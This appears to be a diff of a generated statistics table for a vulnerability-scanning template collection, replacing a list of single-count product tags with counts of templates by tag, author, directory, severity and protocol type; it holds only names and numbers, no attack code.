| | | | | | -| verint | 1 | | | | | | | | | -| web3storage | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| satellian | 1 | | | | | | | | | -| dbt | 1 | | | | | | | | | -| bottle | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| vanguard | 1 | | | | | | | | | -| processmaker | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| fanwei | 1 | | | | | | | | | -| hunter | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| wms | 1 | | | | | | | | | -| ecosys | 1 | | | | | | | | | -| dapp | 1 | | | | | | | | | -| cucm | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| exchangerateapi | 1 | | | | | | | | | -| officekeeper | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| mailmap | 1 | | | | | | | | | -| nerdgraph | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| microcomputers | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| cvms | 1 | | | | | | | | | -| purestorage | 1 | | | | | | | | | -| directadmin | 1 | | | | | | | | | -| supersign | 1 | | | | | | | | | -| wordpress-country-selector | 1 | | | | | | | | | -| unauthenticated | 1 | | | | | | | | | -| cloudrun | 1 | | | | | | | | | -| smartsheet | 1 | | | | | | | | | -| ind780 | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| optimizely | 1 | | | | | | | | | -| aims | 1 | | | | | | | | | -| b2bbuilder | 1 | | | | | | | | | -| buildkite | 1 | | | | | | | | | -| apigee | 1 | | | | | | | | | -| shirnecms | 1 | | | | | | | | | -| sonarcloud | 1 | | | | | | | | | -| adafruit | 1 | | | | | | | | | -| caseaware | 1 | | | | | | | | | -| dotclear | 1 | | | | | | | | | -| csrfguard | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| hanwang | 1 | | | | | | | | | -| suitecrm | 1 | | | | | | | | | -| nimble | 1 | | | | | | | | | -| honeywell | 1 | | | | | | | | | -| shodan | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| coverity | 1 | | | | | | | | | -| yaws | 1 | | | | | | | | | -| orangeforum | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| rsa | 1 | | | | | | | | | -| tugboat | 1 | | | | | | | | | -| pghero | 1 | | | | | | | | | -| olt | 1 | | | | | | | | | -| tectuus | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| aveva | 1 | | | | | | | | | -| coinmarketcap | 1 | | | | | | | | | -| trello | 1 | | | | | | | | | -| pivotaltracker | 1 | | | | | | | | | -| acemanager | 1 | | | | | | | | | -| cliniccases | 1 | | | | | | | | | -| mikrotik | 1 | | | | | | | | | -| all-in-one-video-gallery | 1 | | | | | | | | | -| patreon | 1 | | | | | | | | | -| pagespeed | 1 | | | | | | | | | -| quantum | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| xyxel | 1 | | | | | | | | | -| omniampx | 1 | | | | | | | | | -| clearfy-cache | 1 | | | | | | | | | -| leanix | 1 | | | | | | | | | -| kubecost | 1 | | | | | | | | | -| maximo | 1 | | | | | | | | | -| nozomi | 1 | | | | | | | | | -| binance | 1 | | | | | | | | | -| submitty | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| gpon | 1 | | | | | | | | | -| adb | 1 | | | | | | | | | -| iucn | 1 | | | | | | | | | -| nport | 1 | | | | | | | | | -| segment | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| yarn | 1 | | | | | | | | | -| strider | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| qsan | 1 | | | | | | | | | -| barracuda | 1 | | | | | | | | | -| savepage | 1 | | | | | | | | | -| wakatime | 1 | | | | | | | | | -| aero | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| incomcms | 1 | | | | | | | | | -| davantis | 1 | | | | | | | | | -| kerio | 1 | | | | | | | | | -| iplanet | 1 | | | | | | | | | -| adoptapet | 1 | | | | | | | | | -| connectwise | 1 | | | | | | | | | -| okiko | 1 | | | | | | | | | -| primefaces | 1 | | | | | | | | | -| mongo-express | 1 | | | | | | | | | -| mi | 1 | | | | | | | | | -| genie | 1 | | | | | | | | | -| kvm | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| dss | 1 | | | | | | | | | -| beego | 1 | | | | | | | | | -| nownodes | 1 | | | | | | | | | -| ocs-inventory | 1 | | | | | | | | | -| phpok | 1 | | | | | | | | | -| opengear | 1 | | | | | | | | | -| lionwiki | 1 | | | | | | | | | -| autocomplete | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| zeppelin | 1 | | | | | | | | | -| twitter-server | 1 | | | | | | | | | -| web-dispatcher | 1 | | | | | | | | | -| dicoogle | 1 | | | | | | | | | -| securenvoy | 1 | | | | | | | | | -| netweaver | 1 | | | | | | | | | -| openvz | 1 | | | | | | | | | -| drive | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| siemens | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| etcd | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| flexbe | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| agegate | 1 | | | | | | | | | -| openid | 1 | | | | | | | | | -| acunetix | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| alltube | 1 | | | | | | | | | -| bibliopac | 1 | | | | | | | | | -| pan | 1 | | | | | | | | | -| surreal | 1 | | | | | | | | | -| h5sconsole | 1 | | | | | | | | | -| identityguard | 1 | | | | | | | | | -| charity | 1 | | | | | | | | | -| asana | 1 | | | | | | | | | -| h5s | 1 | | | | | | | | | -| debounce | 1 | | | | | | | | | -| scalar | 1 | | | | | | | | | -| pyproject | 1 | | | | | | | | | -| nj2000 | 1 | | | | | | | | | -| webeditors | 1 | | | | | | | | | -| avatier | 1 | | | | | | | | | -| adfs | 1 | | | | | | | | | -| cnvd2022 | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| netgenie | 1 | | | | | | | | | -| playable | 1 | | | | | | | | | -| novus | 1 | | | | | | | | | -| zipkin | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| clearbit | 1 | | | | | | | | | -| semaphore | 1 | | | | | | | | | -| jvm | 1 | | | | | | | | | -| nopcommerce | 1 | | | | | | | | | -| slstudio | 1 | | | | | | | | | -| playsms | 1 | | | | | | | | | -| openethereum | 1 | | | | | | | | | -| zaver | 1 | | | | | | | | | -| themefusion | 1 | | | | | | | | | -| whmcs | 1 | | | | | | | | | -| jobsearch | 1 | | | | | | | | | -| qts | 1 | | | | | | | | | -| leostream | 1 | | | | | | | | | -| whm | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| strava | 1 | | | | | | | | | -| prexview | 1 | | | | | | | | | -| headers | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| mappress | 1 | | | | | | | | | -| openpagerank | 1 | | | | | | | | | -| bitdefender | 1 | | | | | | | | | -| cvent | 1 | | | | | | | | | -| wondercms | 1 | | | | | | | | | -| mcloud | 1 | | | | | | | | | -| contentful | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| announcekit | 1 | | | | | | | | | -| edms | 1 | | | | | | | | | -| flowdash | 1 | | | | | | | | | -| xproxy | 1 | | | | | | | | | -| agentejo | 1 | | | | | | | | | -| onkyo | 1 | | | | | | | | | -| blockfrost | 1 | | | | | | | | | -| webshell | 1 | | | | | | | | | -| twig | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| formcraft3 | 1 | | | | | | | | | -| juniper | 1 | | | | | | | | | -| php-fusion | 1 | | | | | | | | | -| intellislot | 1 | | | | | | | | | -| qmail | 1 | | | | | | | | | -| cx | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| cluster | 1 | | | | | | | | | -| kyocera | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| urlscan | 1 | | | | | | | | | -| citybook | 1 | | | | | | | | | -| guppy | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| place | 1 | | | | | | | | | -| wp-stats-manager | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| adminset | 1 | | | | | | | | | -| blackduck | 1 | | | | | | | | | -| xenforo | 1 | | | | | | | | | -| clockify | 1 | | | | | | | | | -| hivequeue | 1 | | | | | | | | | -| glowroot | 1 | | | | | | | | | -| bamboo | 1 | | | | | | | | | -| intellect | 1 | | | | | | | | | -| blitapp | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| smartping | 1 | | | | | | | | | -| eyoumail | 1 | | | | | | | | | -| dnn | 1 | | | | | | | | | -| behat | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| analytify | 1 | | | | | | | | | -| vertex | 1 | | | | | | | | | -| siebel | 1 | | | | | | | | | -| tox | 1 | | | | | | | | | -| permissions | 1 | | | | | | | | | -| tuxedo | 1 | | | | | | | | | -| shiro | 1 | | | | | | | | | -| phoronix | 1 | | | | | | | | | -| phpwind | 1 | | | | | | | | | -| learnpress | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| fuji | 1 | | | | | | | | | -| fortressaircraft | 1 | | | | | | | | | -| contentkeeper | 1 | | | | | | | | | -| groupoffice | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| synapse | 1 | | | | | | | | | -| tracing | 1 | | | | | | | | | -| userstack | 1 | | | | | | | | | -| goip | 1 | | | | | | | | | -| emessage | 1 | | | | | | | | | -| sar2html | 1 | | | | | | | | | -| acontent | 1 | | | | | | | | | -| cve2000 | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| teradici | 1 | | | | | | | | | -| sicom | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| gargoyle | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| ti-woocommerce-wishlist | 1 | | | | | | | | | -| hdnetwork | 1 | | | | | | | | | -| iterable | 1 | | | | | | | | | -| ixbusweb | 1 | | | | | | | | | -| osquery | 1 | | | | | | | | | -| bingmaps | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| imap | 1 | | | | | | | | | -| archibus | 1 | | | | | | | | | -| casemanager | 1 | | | | | | | | | -| yishaadmin | 1 | | | | | | | | | -| scraperapi | 1 | | | | | | | | | -| qvisdvr | 1 | | | | | | | | | -| achecker | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| gnuboard5 | 1 | | | | | | | | | -| cve2001 | 1 | | | | | | | | | -| mobile | 1 | | | | | | | | | -| sslmate | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| webctrl | 1 | | | | | | | | | -| aryanic | 1 | | | | | | | | | -| webex | 1 | | | | | | | | | -| puppetdb | 1 | | | | | | | | | -| piwik | 1 | | | | | | | | | -| novius | 1 | | | | | | | | | -| gsm | 1 | | | | | | | | | -| chronoforums | 1 | | | | | | | | | -| sls | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| improvmx | 1 | | | | | | | | | -| secnet-ac | 1 | | | | | | | | | -| kindeditor | 1 | | | | | | | | | -| opennebula | 1 | | | | | | | | | -| ptr | 1 | | | | | | | | | -| v2924 | 1 | | | | | | | | | -| drill | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| zoomeye | 1 | | | | | | | | | -| ocean-extra | 1 | | | | | | | | | -| hetzner | 1 | | | | | | | | | -| tianqing | 1 | | | | | | | | | -| web-suite | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| jspxcms | 1 | | | | | | | | | -| coinlayer | 1 | | | | | | | | | -| cloudconvert | 1 | | | | | | | | | -| passwordmanager | 1 | | | | | | | | | -| alquist | 1 | | | | | | | | | -| fox | 1 | | | | | | | | | -| remkon | 1 | | | | | | | | | -| 3dprint | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| piluscart | 1 | | | | | | | | | -| netic | 1 | | | | | | | | | -| pirelli | 1 | | | | | | | | | -| blogengine | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| quip | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| homeautomation | 1 | | | | | | | | | -| kronos | 1 | | | | | | | | | -| nimsoft | 1 | | | | | | | | | -| cybrotech | 1 | | | | | | | | | -| biotime | 1 | | | | | | | | | -| hypertest | 1 | | | | | | | | | -| stridercd | 1 | | | | | | | | | -| emerson | 1 | | | | | | | | | -| schneider | 1 | | | | | | | | | -| idera | 1 | | | | | | | | | -| scrapestack | 1 | | | | | | | | | -| i3geo | 1 | | | | | | | | | -| securitytrails | 1 | | | | | | | | | -| opencti | 1 | | | | | | | | | -| wordcloud | 1 | | | | | | | | | -| tieline | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| revealjs | 1 | | | | | | | | | -| all-in-one-wp-migration | 1 | | | | | | | | | -| luci | 1 | | | | | | | | | -| sage | 1 | | | | | | | | | -| racksnet | 1 | | | | | | | | | -| dropbear | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| micro | 1 | | | | | | | | | -| simplecrm | 1 | | | | | | | | | -| owa | 1 | | | | | | | | | -| ojs | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| nzbget | 1 | | | | | | | | | -| pagekit | 1 | | | | | | | | | -| calendarific | 1 | | | | | | | | | -| somansa | 1 | | | | | | | | | -| tembosocial | 1 | | | | | | | | | -| tracer | 1 | | | | | | | | | -| mirasys | 1 | | | | | | | | | -| rdp | 1 | | | | | | | | | -| webasyst | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| tracking | 1 | | | | | | | | | -| redcap | 1 | | | | | | | | | -| videoxpert | 1 | | | | | | | | | -| guard | 1 | | | | | | | | | -| omi | 1 | | | | | | | | | -| phpbb | 1 | | | | | | | | | -| vision | 1 | | | | | | | | | -| mdm | 1 | | | | | | | | | -| ourmgmt3 | 1 | | | | | | | | | -| office365 | 1 | | | | | | | | | -| flureedb | 1 | | | | | | | | | -| webp | 1 | | | | | | | | | -| privatekey | 1 | | | | | | | | | -| commvault | 1 | | | | | | | | | -| ecsimagingpacs | 1 | | | | | | | | | -| gilacms | 1 | | | | | | | | | -| qualcomm | 1 | | | | | | | | | -| maxsite | 1 | | | | | | | | | -| opencart | 1 | | | | | | | | | -| edgemax | 1 | | | | | | | | | -| room-alert | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| karel | 1 | | | | | | | | | -| backupbuddy | 1 | | | | | | | | | -| mtheme | 1 | | | | | | | | | -| gopher | 1 | | | | | | | | | -| d-link | 1 | | | | | | | | | -| polarisft | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| pubsec | 1 | | | | | | | | | -| editor | 1 | | | | | | | | | -| grandnode | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| screenshot | 1 | | | | | | | | | -| smartgateway | 1 | | | | | | | | | -| apim | 1 | | | | | | | | | -| loancms | 1 | | | | | | | | | -| musicstore | 1 | | | | | | | | | -| nuget | 1 | | | | | | | | | -| contactform | 1 | | | | | | | | | -| argussurveillance | 1 | | | | | | | | | -| epm | 1 | | | | | | | | | -| scrutinizer | 1 | | | | | | | | | -| mkdocs | 1 | | | | | | | | | -| powertek | 1 | | | | | | | | | -| amp | 1 | | | | | | | | | -| mrtg | 1 | | | | | | | | | -| smf | 1 | | | | | | | | | -| udraw | 1 | | | | | | | | | -| iq-block-country | 1 | | | | | | | | | -| myvuehelp | 1 | | | | | | | | | -| webcenter | 1 | | | | | | | | | -| ez | 1 | | | | | | | | | -| sefile | 1 | | | | | | | | | -| issabel | 1 | | | | | | | | | -| pdflayer | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| babel | 1 | | | | | | | | | -| tinymce | 1 | | | | | | | | | -| abuseipdb | 1 | | | | | | | | | -| timezone | 1 | | | | | | | | | -| fontawesome | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| sony | 1 | | | | | | | | | -| orbiteam | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|----------------------------------|-------|-------------------------------------|-------|------------------|-------|----------|-------|---------|-------| +| cve | 1526 | dhiyaneshdk | 687 | cves | 1504 | info | 1618 | http | 4218 | +| panel | 747 | daffainfo | 659 | exposed-panels | 751 | high | 1135 | file | 77 | +| edb | 575 | pikpikcu | 340 | vulnerabilities | 517 | medium | 822 | network | 70 | +| xss | 533 | pdteam | 274 | misconfiguration | 338 | critical | 540 | dns | 17 | +| exposure | 525 | geeknik | 196 | technologies | 306 | low | 260 | | | +| lfi | 518 | dwisiswant0 | 171 | exposures | 300 | unknown | 23 | | | +| wordpress | 460 | 0x_akoko | 169 | token-spray | 235 | | | | | +| cve2021 | 365 | ritikchaddha | 159 | workflows | 190 | | | | | +| wp-plugin | 355 | pussycat0x | 157 | default-logins | 113 | | | | | +| rce | 343 | princechaddha | 153 | file | 77 | | | | | +| tech | 319 | gy741 | 134 | takeovers | 68 | | | | | +| packetstorm | 291 | arafatansari | 102 | network | 56 | | | | | +| cve2022 | 255 | tess | 74 | iot | 40 | | | | | +| wpscan | 247 | madrobot | 65 | cnvd | 25 | | | | | +| token-spray | 235 | zzeitlin | 64 | miscellaneous | 25 | | | | | +| cve2020 | 217 | idealphase | 61 | dns | 17 | | | | | +| misconfig | 212 | akincibor | 51 | fuzzing | 12 | | | | | +| | 195 | for3stco1d | 47 | ssl | 8 | | | | | +| unauth | 188 | gaurang | 42 | headless | 7 | | | | | +| wp | 177 | philippedelteil | 36 | | | | | | | +| kev | 167 | adam crosser | 31 | | | | | | | +| config | 162 | edoardottt | 28 | | | | | | | +| cve2018 | 145 | ice3man | 26 | | | | | | | +| cve2019 | 137 | c-sh0 | 26 | | | | | | | +| joomla | 135 | theamanrawat | 26 | | | | | | | +| default-login | 129 | organiccrap | 24 | | | | | | | +| oast | 127 | ffffffff0x | 22 | | | | | | | +| apache | 124 | righettod | 22 | | | | | | | +| iot | 122 | techbrunchfr | 21 | | | | | | | +| authenticated | 117 | cckuailong | 18 | | | | | | | +| cve2010 | 111 | sullo | 17 | | | | | | | +| sqli | 111 | sheikhrishad | 15 | | | | | | | +| router | 90 | pr3r00t | 15 | | | | | | | +| redirect | 89 | milo2012 | 14 | | | | | | | +| files | 89 | r3dg33k | 14 | | | | | | | +| login | 88 | sharath | 13 | | | | | | | +| devops | 75 | johnk3r | 13 | | | | | | | +| takeover | 74 | 0ri2n | 13 | | | | | | | +| token | 73 | tenbird | 13 | | | | | | | +| network | 73 | random-robbie | 12 | | | | | | | +| ssrf | 72 | suman_kar | 12 | | | | | | | +| cve2017 | 70 | melbadry9 | 12 | | | | | | | +| cms | 67 | dogasantos | 11 | | | | | | | +| auth-bypass | 64 | elsfa7110 | 11 | | | | | | | +| file | 63 | cyllective | 11 | | | | | | | +| oracle | 62 | wdahlenb | 11 | | | | | | | +| intrusive | 59 | nadino | 10 | | | | | | | +| install | 57 | meme-lord | 10 | | | | | | | +| seclists | 56 | random_robbie | 10 | | | | | | | +| disclosure | 54 | hackergautam | 10 | | | | | | | +| cisco | 49 | logicalhunter | 10 | | | | | | | +| cve2016 | 49 | alph4byt3 | 10 | | | | | | | +| oss | 49 | emadshanab | 9 | | | | | | | +| google | 48 | oppsec | 9 | | | | | | | +| cve2015 | 47 | 0x240x23elu | 9 | | | | | | | +| fileupload | 47 | that_juan_ | 8 | | | | | | | +| adobe | 45 | veshraj | 8 | | | | | | | +| aem | 42 | lu4nx | 8 | | | | | | | +| plugin | 41 | zh | 8 | | | | | | | +| cve2014 | 41 | aashiq | 8 | | | | | | | +| vulhub | 38 | iamthefrogy | 8 | | | | | | | +| atlassian | 38 | leovalcante | 7 | | | | | | | +| vmware | 38 | caspergn | 7 | | | | | | | +| logs | 37 | dr_set | 7 | | | | | | | +| traversal | 35 | randomstr1ng | 7 | | | | | | | +| tenable | 35 | techryptic (@tech) | 7 | | | | | | | +| springboot | 35 | amit-jd | 7 | | | | | | | +| injection | 33 | kophjager007 | 7 | | | | | | | +| hackerone | 33 | harshbothra_ | 7 | | | | | | | +| jira | 32 | divya_mudgal | 7 | | | | | | | +| listing | 31 | __fazal | 6 | | | | | | | +| kubernetes | 29 | _0xf4n9x_ | 6 | | | | | | | +| huntr | 29 | gitlab red team | 6 | | | | | | | +| generic | 28 | rootxharsh | 6 | | | | | | | +| dns | 27 | ricardomaia | 6 | | | | | | | +| debug | 26 | imnightmaree | 6 | | | | | | | +| log4j | 26 | nullfuzz | 6 | | | | | | | +| cnvd | 25 | evan rubinstein | 6 | | | | | | | +| sap | 25 | pentest_swissky | 6 | | | | | | | +| microsoft | 24 | forgedhallpass | 6 | | | | | | | +| jndi | 23 | puzzlepeaches | 6 | | | | | | | +| misc | 23 | iamnoooob | 6 | | | | | | | +| proxy | 23 | pathtaga | 6 | | | | | | | +| php | 22 | praetorian-thendrickson | 6 | | | | | | | +| aws | 22 | yanyun | 5 | | | | | | | +| manageengine | 21 | clem9669 | 5 | | | | | | | +| zoho | 21 | joanbono | 5 | | | | | | | +| wp-theme | 21 | podalirius | 5 | | | | | | | +| fuzz | 21 | nodauf | 5 | | | | | | | +| cve2012 | 20 | xelkomy | 5 | | | | | | | +| weblogic | 20 | ganofins | 5 | | | | | | | +| cloud | 20 | prajiteshsingh | 5 | | | | | | | +| api | 19 | panch0r3d | 5 | | | | | | | +| cicd | 19 | scent2d | 4 | | | | | | | +| camera | 19 | wisnupramoedya | 4 | | | | | | | +| deserialization | 19 | dolev farhi | 4 | | | | | | | +| k8s | 19 | r3naissance | 4 | | | | | | | +| ibm | 19 | h1ei1 | 4 | | | | | | | +| tomcat | 19 | 0xlittleboy | 4 | | | | | | | +| gitlab | 18 | incogbyte | 4 | | | | | | | +| service | 18 | defr0ggy | 4 | | | | | | | +| dlink | 18 | tanq16 | 4 | | | | | | | +| wavlink | 17 | e_schultze_ | 4 | | | | | | | +| firewall | 17 | robotshell | 4 | | | | | | | +| jenkins | 17 | 3th1c_yuk1 | 4 | | | | | | | +| ftp | 17 | dadevel | 4 | | | | | | | +| printer | 16 | its0x08 | 4 | | | | | | | +| struts | 16 | atomiczsec | 3 | | | | | | | +| cve2011 | 15 | hahwul | 3 | | | | | | | +| nginx | 15 | lark-lab | 3 | | | | | | | +| xxe | 15 | skeltavik | 3 | | | | | | | +| cve2009 | 15 | ekrause | 3 | | | | | | | +| fortinet | 14 | shine | 3 | | | | | | | +| hp | 14 | 0w4ys | 3 | | | | | | | +| domainmod | 14 | andydoering | 3 | | | | | | | +| msf | 14 | mr-xn | 3 | | | | | | | +| android | 14 | lucasljm2001 | 3 | | | | | | | +| java | 14 | fyoorer | 3 | | | | | | | +| amazon | 13 | sushantkamble | 3 | | | | | | | +| cve2013 | 13 | _generic_human_ | 3 | | | | | | | +| status | 13 | yash anand @yashanand155 | 3 | | | | | | | +| confluence | 13 | ph33r | 3 | | | | | | | +| magento | 13 | splint3r7 | 3 | | | | | | | +| abstractapi | 13 | unstabl3 | 3 | | | | | | | +| lfr | 13 | impramodsargar | 3 | | | | | | | +| woocommerce | 13 | emenalf | 3 | | | | | | | +| netsweeper | 12 | kh4sh3i | 3 | | | | | | | +| rails | 12 | powerexploit | 3 | | | | | | | +| graphql | 12 | me9187 | 3 | | | | | | | +| drupal | 12 | dudez | 3 | | | | | | | +| ruijie | 12 | f1tz | 3 | | | | | | | +| backup | 12 | whoever | 3 | | | | | | | +| netgear | 12 | supras | 3 | | | | | | | +| cve2008 | 12 | binaryfigments | 3 | | | | | | | +| microweber | 12 | fxploit | 3 | | | | | | | +| airflow | 11 | davidmckennirey | 3 | | | | | | | +| vpn | 11 | yuzhe-zhang-0 | 3 | | | | | | | +| cisa | 11 | jarijaas | 3 | | | | | | | +| webserver | 11 | swissky | 3 | | | | | | | +| azure | 11 | alifathi-h1 | 3 | | | | | | | +| cnvd2021 | 11 | johnjhacking | 3 | | | | | | | +| ssl | 11 | z3bd | 3 | | | | | | | +| fortigate | 11 | arcc | 3 | | | | | | | +| backdoor | 11 | dr0pd34d | 3 | | | | | | | +| github | 11 | thomas_from_offensity | 3 | | | | | | | +| grafana | 10 | shifacyclewala | 3 | | | | | | | +| git | 10 | mavericknerd | 3 | | | | | | | +| ruby | 10 | joeldeleep | 2 | | | | | | | +| dell | 10 | fabaff | 2 | | | | | | | +| glpi | 10 | pxmme1337 | 2 | | | | | | | +| jolokia | 10 | brenocss | 2 | | | | | | | +| zyxel | 10 | 0xcrypto | 2 | | | | | | | +| django | 10 | bananabr | 2 | | | | | | | +| laravel | 10 | moritz nentwig | 2 | | | | | | | +| coldfusion | 10 | hetroublemakr | 2 | | | | | | | +| spring | 10 | geekby | 2 | | | | | | | +| kube | 9 | dbrwsky | 2 | | | | | | | +| wso2 | 9 | w4cky_ | 2 | | | | | | | +| dedecms | 9 | kiblyn11 | 2 | | | | | | | +| prometheus | 9 | korteke | 2 | | | | | | | +| zimbra | 9 | nuk3s3c | 2 | | | | | | | +| iis | 9 | ehsahil | 2 | | | | | | | +| vcenter | 9 | redteambrasil | 2 | | | | | | | +| fastjson | 9 | 0xelkomy | 2 | | | | | | | +| sonicwall | 9 | smaranchand | 2 | | | | | | | +| zabbix | 9 | udit_thakkur | 2 | | | | | | | +| ssti | 9 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| phpmyadmin | 9 | parth | 2 | | | | | | | +| windows | 9 | ree4pwn | 2 | | | | | | | +| hms | 8 | ambassify | 2 | | | | | | | +| kafka | 8 | israel comazzetto dos reis | 2 | | | | | | | +| mail | 8 | gevakun | 2 | | | | | | | +| citrix | 8 | amsda | 2 | | | | | | | +| auth | 8 | github.com/its0x08 | 2 | | | | | | | +| recon | 8 | badboycxcc | 2 | | | | | | | +| elasticsearch | 8 | myztique | 2 | | | | | | | +| audit | 8 | socketz | 2 | | | | | | | +| solr | 8 | 0xsapra | 2 | | | | | | | +| metadata | 8 | paradessia | 2 | | | | | | | +| mirai | 8 | ajaysenr | 2 | | | | | | | +| jboss | 8 | 0xnirvana | 2 | | | | | | | +| headless | 8 | uomogrande | 2 | | | | | | | +| scada | 8 | canberbamber | 2 | | | | | | | +| cisco-switch | 8 | martincodes-de | 2 | | | | | | | +| config-audit | 8 | rafaelwdornelas | 2 | | | | | | | +| jetbrains | 7 | d4vy | 2 | | | | | | | +| icewarp | 7 | evergreencartoons | 2 | | | | | | | +| bucket | 7 | luci | 2 | | | | | | | +| seeyon | 7 | kre80r | 2 | | | | | | | +| maps | 7 | hackerarpan | 2 | | | | | | | +| ssh | 7 | danielmofer | 2 | | | | | | | +| exchange | 7 | thezakman | 2 | | | | | | | +| squirrelmail | 7 | dahse89 | 2 | | | | | | | +| druid | 7 | huowuzhao | 2 | | | | | | | +| blind | 7 | thardt-praetorian | 2 | | | | | | | +| npm | 7 | joshlarsen | 2 | | | | | | | +| docker | 7 | 0xprial | 2 | | | | | | | +| solarview | 7 | bernardofsr | 2 | | | | | | | +| python | 7 | bp0lr | 2 | | | | | | | +| symfony | 7 | mohammedsaneem | 2 | | | | | | | +| cnvd2020 | 7 | raesene | 2 | | | | | | | +| firebase | 7 | cckuakilong | 2 | | | | | | | +| opencats | 7 | lotusdll | 2 | | | | | | | +| go | 7 | n-thumann | 2 | | | | | | | +| samsung | 7 | y4er | 2 | | | | | | | +| nodejs | 7 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| fpd | 6 | zomsop82 | 2 | | | | | | | +| bigip | 6 | codexlynx | 2 | | | | | | | +| emerge | 6 | nkxxkn | 2 | | | | | | | +| moodle | 6 | true13 | 2 | | | | | | | +| db | 6 | vavkamil | 2 | | | | | | | +| websphere | 6 | randomrobbie | 2 | | | | | | | +| liferay | 6 | 666asd | 2 | | | | | | | +| magmi | 6 | koti2 | 2 | | | | | | | +| ofbiz | 6 | sbani | 2 | | | | | | | +| vms | 6 | g4l1t0 | 2 | | | | | | | +| enum | 6 | k11h-de | 2 | | | | | | | +| sitecore | 6 | convisoappsec | 2 | | | | | | | +| microstrategy | 6 | dheerajmadhukar | 2 | | | | | | | +| zhiyuan | 6 | manas_harsh | 2 | | | | | | | +| artica | 6 | 0xrudra | 2 | | | | | | | +| ognl | 6 | cocxanh | 2 | | | | | | | +| huawei | 6 | ricardo maia (brainfork) | 2 | | | | | | | +| slack | 6 | v0idc0de | 2 | | | | | | | +| kubelet | 6 | 0xsmiley | 2 | | | | | | | +| opensis | 6 | r12w4n | 2 | | | | | | | +| openvpn | 6 | bsysop | 2 | | | | | | | +| setup | 6 | vsh00t | 2 | | | | | | | +| lucee | 6 | clarkvoss | 2 | | | | | | | +| jamf | 6 | sy3omda | 2 | | | | | | | +| crlf | 6 | taielab | 2 | | | | | | | +| ecology | 6 | bing0o | 2 | | | | | | | +| jetty | 6 | x1m_martijn | 2 | | | | | | | +| bypass | 6 | afaq | 2 | | | | | | | +| activemq | 6 | 8arthur | 2 | | | | | | | +| rconfig | 6 | gal nagli | 2 | | | | | | | +| cobbler | 6 | paperpen | 2 | | | | | | | +| fatpipe | 5 | 